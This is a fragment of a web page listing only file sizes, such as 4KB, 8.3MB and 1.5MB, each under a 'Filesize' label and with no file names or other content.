-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
136KB
-
Filesize
32KB
-
Filesize
1.5MB
-
Filesize
1.1MB
-
Filesize
5.9MB
-
Filesize
80KB
-
Filesize
5.2MB
-
Filesize
204KB
-
Filesize
52KB
-
Filesize
100KB
-
Filesize
820KB
-
Filesize
140KB
-
Filesize
100KB
-
Filesize
180KB
-
Filesize
144KB
-
Filesize
52KB
-
Filesize
1.5MB
-
Filesize
60KB
-
Filesize
5.2MB
-
Filesize
144KB
-
Filesize
1.5MB
-
Filesize
5.9MB
-
Filesize
1.1MB
-
Filesize
100KB
-
Filesize
820KB
-
Filesize
204KB
-
Filesize
1.5MB
-
Filesize
140KB
-
Filesize
1.1MB
-
Filesize
80KB
-
Filesize
52KB
-
Filesize
144KB
-
Filesize
5.9MB
-
Filesize
5.2MB
-
Filesize
5.2MB
-
Filesize
820KB
-
Filesize
204KB
-
Filesize
100KB
-
Filesize
52KB
-
Filesize
140KB
-
Filesize
100KB
-
Filesize
180KB
-
Filesize
144KB
-
Filesize
60KB
-
Filesize
5.9MB